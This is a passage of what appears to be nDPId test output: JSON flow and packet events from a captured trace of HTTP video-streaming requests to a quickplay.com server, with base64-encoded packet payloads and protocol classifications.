OvUh05tiZ\/balrrwKQt2cEeJstEBP0D5BLZnKvY160w+\/OrxB+sjFauMt5dnHUcI3t7SoTqChgxCrhMkNhG6YVl2LK8pgjuYhqcDRox+KgQzOA\/hLmGzg3uirtssbFIVC5Aro3ACcGCwISGwb1VxWHonPvyWHNDlG81Bqq3QQetunNZnl6oz4rq\/ZHNPTVG61wMgLdvvo4GWhjgZ\/bnblrSFNGd7Mdr5MexXVx6SfeJVyvwBelPETxWHKKoRDa8ZjUvT0cEJOB7G\/G7e4ZZ\/83OAc7CIIAAEA\/iIulwzriBqhJkUE6bpVlTg1QY+rX1\/uCF5JNOyMtykH7DdhqEwaXY8s7mPz38wS8mngvjnR+4AS+bZOCqFuqMeaMn6SzJIMOPFhSp7GcsxUbtqiwMa7\/yvtnpf2t24H4WaAC+sVExSgCQaWyVTSeVY6vezz8ABeIl3WAAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1429000153937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000153937,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeag6kAAPwZJswo2qfp4HCMoyzEAUC00WpDdwOXGUBgBycCpAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDgudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0048.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -02356{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1429000156273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"thread_ts_msec":1429000156273,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaB3UUAArQYBdngcIygKNqn6AFDLMd3LpTQtNFxOUBAIItXfAAChEIrgrleYAhFa3F3938BggSrcIn+nqVX5sByKXTUtTZ+S0IwO\/hIwf0BB2uc3Bf5jC1QfzUHjRvDUIOnnsb5a0uxxhiIVAqWnEYC45w18yjCMLPuOKVZeOYgfCQVjYsxLAKkdXaRkmMu4Zoel0HztrVYR1cnta\/vSYGQ0WkMhgl3KFYUm\/X4qjjWEdowcfDAWr\/FWJBR4jsXSxR8EQOd7RYpfWOl0YqAXrcURgivoA\/Vazm9dSSQ6DzW0D1TNTghMrqCseZaLLp2diY5etWqcT5Lxxdnl2ino6PEahKmf04RjOZq83lwn5PEPti9QeNcfMNctSiHj28O5VeDtauVKLipzStAYJu6O1tMaMLByrHeLYYc5MbsLRR9vao6KZRnJE1AEzpmLa\/+YrNJZcLrW3joqQ2AvZzJNsHv1pr7090xMkT87olqCX5Yd5dgxMvv2CbBfzbv7iN0239xxLePmefbZXxmf1ljpyZUWt+YUi19f0cGaafC5roKKnRsDLjalFhQzNZMDN1+qROgcpPpFrfcPRzSCRX2oM3IXqFNyhnIqEBeoqjt\/rN0OghieSXA+J4\/fnibDY2oBF\/qPi7PmT7+EZQfp4dOU7LXGxwfkHyb\/+nSUhuDDHBPkRtLg+XO3xXfDG63CCzgP9j+ew7ylJL7s8zjEAnk0iP7KsAXK1fFcvUkB5LITD3qa1hjsRXNIyWIaxMkwR8GhlPLtf0hpPiS0Um8a1yduUSn4xM5n3AHwQrDyknL7fxErOcmIBqXcP2oyyyTV+m9b64iHrtRxBINGeYaff6lhmqnRqCvGC1F52Og\/seNDfW8RWv4yBXzQwblMI7xviVAgMjEyKmjtOXwyzWj0J+YuHjA3wXbbyRFf\/zujxfqXq0HOg5HobG69sZOgCtlNOxGxs6uNG3Nyl1bm6YuhORfGFVH4dDhxB4pM4mawqKQgNd3ZivrDKzWiLphhw89pFSEPmrYR+dSw4\/6dNuOLRnG16Am5LUzsom4k95ky9x\/PVPzeU+5ie6mhY
pgOrbjeFpz+rg+m9C+NB8SEBd6muVe4B37GCYUkUck7iEmhbPSKsrUqKYVveBJ0WJIstk9mKFzxlfKH3J2\/bjYqxEQYbmgG6oJ5ralnDKawN31PTuvOshsQceM7W53\/H7rfpivL6lr\/kjGpOhEd9Dxxlf9p+4v7nxfQAiorCo+Ipnx1Vx4\/M8DFoeolmxcpnpC1\/t87cEimWGKlQKNWBmqgBX3lF+jG0RumppZSWz\/aQfU6VQwCojXD7XsZoKlt0fqkAcQPgNbx4gtOwebSddbvGBn7uPBEFCe1qtOY1P6e8nyGK8y1LANkR3tsNsXJFvHkj5HBf+Fth6gbnan75B2fOeWrkdUU90lajYKwLL1LL5gxqWv1nPgRm5gG0V\/LUY3dCEIra5BI+d3CAtAPKtdluT\/JXWML4j3eAT74+s9ouu5yox25rXWvrCvhcuf5BYDjdzBBmrYB\/t4fb52bttXAQuL80qQnY5Oj1X5f+Um3rpgjwFtGj7n30bbQASEZTdFPUOe8kJs7mBkrIY6yotsjZG+hKNfMJZdhU8ZShuzC8djNjp9NuCLli+\/ugxOOk4+twmaL+UUbEqGDcxcAEBa5EyOAV7RfqezgWcaQ3dbJjWXdNWxetLCdQ7XanJt3eAkt933KoymlC4XmU95LAhWF33+FFwL3BYas4y5X8wDDUnULI8QtkzKEN2oLGgIewtkuDrW4wpL3EZsIKv86JV8UzFxUMaP2MiczrH7WqOOsj1ytSR\/mRWDeXJftrtXq0qR46GntPeDZXJQKpY9CB2cQr+2LnDbM8iBOGE8HrF8a0W0JfepPoC6ozHQ5CxM0HE7L3V4aaQ=="} -01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1429000156459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000156459,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaip0AAPwZH9go2qfp4HCMoyzEAUC00XE7dy64AUBhgH5dQAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 
-00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":112,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1429000052350,"flow_last_seen":1429000055158,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1429000184253,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1429000207973,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000207973,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYfhkAAPwbLFwo2qfp4HCMoyzIAUDz1EP7kfsOCUBgByRv\/AABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTIudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0052.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1429000210014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":128,"pkt_l4_len":92,"thread_ts_msec":1429000210014,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHCiFUAArQbb4XgcIygKNqn6AFDLMuSI3uA89RK8UBgIIiZoAAA7o06lOUMR9b0tN4NqWqjYHmUkbAcezqY5k1Ckm0MtYSmllf\/mEyyNorAHBlAKlc3tlqWmVMYy6YLe45g7yxi7BP1GlteorxU="} 
-01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1429000210215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000210215,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYhUEAAPwbJTQo2qfp4HCMoyzIAUDz1ErzkiN8oUBhgH586AABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTMudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1429000237766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000237766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYTSEAAPwbXVQo2qfp4HCMoyzMAUBi\/CFv73vENUBgByQDsAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTUudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0055.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -01271{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1429000239838,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":652,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":652,"pkt_l4_len":616,"thread_ts_msec":1429000239838,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAnwr2EAArAZRE3gcIygKNqn6AFDLM\/vq+JsYvwoZUBgIInF9AABzYj3YcVRlOp3c+LTFyFpK8hJq+9ow2Mvt7DtOuHGzxpnR+3r13CHw+E3iWLlq+exgWJJWm8EH8pTbwRe+x8\/D4xNXRBwksI9Csb4QsiJPsfT2+RDiLS02aidPx7uSbhK8jMvrBH5tHxdpa1MFSWCqjYPTrHUzNzOA9TY5FgYYDDMkEDm7gO5123w4n1MAhsXStfcoQ3nSRMywWBjQbHZWkL++gHWx\/\/bzYnpJ21s22WZTz+idJIBFeazv4DxMARlrjHvFswfnI5PHnRRlJ35I7r1qBSMNM3mL3d8eBq5Li+cUyPU9itxuknh7PGxS38quOs1TDTVg7FntfS3WF5atx9VBXKTp0aVWtu3ILXC6hNWU\/3GWggrR0a3pT3Hg6QnXTm4c911OZjeTJVo9BcqKuNrC54rvRTCDA32\/HDU6hjsWUORfbA\/u7H1kGeJSFG\/fOMyzkamr7WzvqgnibwnuBc0xZxB9tpVk0llxH2XWzC3EK3M6+lvnjFarcNCJ93EYtE6CK75PtO2Yi7ZSrr3mOwYlgtK8Yp0yb7vwqI\/2DSjngCc+Sn1445B4mHIXhp7fd7CP2bpJi3Gy6qjSlxiy6iOAVea4ViBsitRQkSJFsgN9tKobyQWEjA0Iq\/LCYaZ8fynI94mgU9gbtQkXI5Y7NPc0FmJseEdZ62w2m6qgfXo6nPxb2wkFc\/k2DVuvOgbbk\/FGlh+lWIZwut4KOX\/pap\/MEzShFHEPoHfax3dVeu1dix8C0CE3+qvmRiSOV8\/NDfdKpdkErPHZ3dWKhtrNlCDmPw=="} 
-01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1429000240020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000240020,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYVGUAAPwbVhAo2qfp4HCMoyzMAUBi\/Chn76vrvUBhgH5XpAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1429000347103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000347103,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaYDkAAPwZSjwo2qfp4HCMoyzUAUMz93a23S9rhUBgBydEWAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0066.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -02077{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1429000350324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1248,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1248,"pkt_l4_len":1212,"thread_ts_msec":1429000350324,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBNBb\/EAArQYdm3gcIygKNqn6AFDLNbdZW8fM\/d9rUBgIIqcYAAD+T5O3IPZmBv71L8WfkixgJr\/jAt3\/6kLgAlGb+bz0ykowoo+NPkYJoM9UpoIVOvy80c0V1g1txC7AgybX1gMQCPuO2tL7\/YFSRxMejmWc4iVxTJSsqhfOA46142Bs1WbBta5O\/SisV8I6pVbO3GCxSbhFLwGr\/WZMUvJFa03S2huv7nozg+bdD4ixlKAFqDdBblAS5LqKSvj+fOg7qedCUtEMdl2BX1M92lt5m6MQhdflPtDytEcZ0QkUCdMH9OHvhlDAvSTeyAtHyfYMIr7y2wFDjfyFOM32EeqMcgEsS0MQwjTKiEkzEJ8uGfrxRfO5oVpc6VJ+xU5oxB5UzhG8pmTwc93Y2+GfYxPPy6ggTaHy\/d8I7FePvcMuO0KR+65nFfpCrRJnDXWI0WHUQIZcOwglbU1AfE\/G0U1NohfpkoAAnwPGa2AwV3oZoMhAulbVm